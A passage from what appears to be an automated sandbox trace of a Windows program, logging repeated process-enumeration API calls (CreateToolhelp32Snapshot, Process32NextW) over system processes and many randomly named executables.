lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0153.552] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0153.554] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0153.555] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0153.556] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0153.558] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0153.562] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0153.563] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0153.564] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0153.565] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.567] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0153.568] CloseHandle (hObject=0xc4) returned 1 [0153.568] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0153.574] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.575] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0153.618] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0153.619] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0153.620] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0153.620] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0153.621] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0153.621] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0153.622] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0153.623] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0153.624] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.624] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.625] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.626] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.626] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.627] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0153.628] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.628] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.629] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0153.630] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.631] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0153.632] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0153.633] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0153.635] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0153.636] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.637] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0153.638] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0153.640] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0153.641] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0153.642] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0153.643] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0153.644] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0153.645] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0153.647] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0153.648] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0153.649] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0153.650] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0153.652] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0153.653] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0153.660] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0153.661] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0153.662] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0153.663] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0153.664] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0153.665] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0153.666] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0153.667] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.669] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0153.670] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0153.671] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0153.672] CloseHandle (hObject=0xbc) returned 1 [0153.672] Sleep (dwMilliseconds=0x12c) [0153.983] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0153.989] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.990] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0153.991] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0153.992] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0153.992] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0153.996] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0153.997] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0153.998] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0153.999] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0154.000] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0154.001] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.002] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.003] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.004] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.005] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.006] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0154.006] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.007] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.008] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0154.010] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.011] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0154.021] 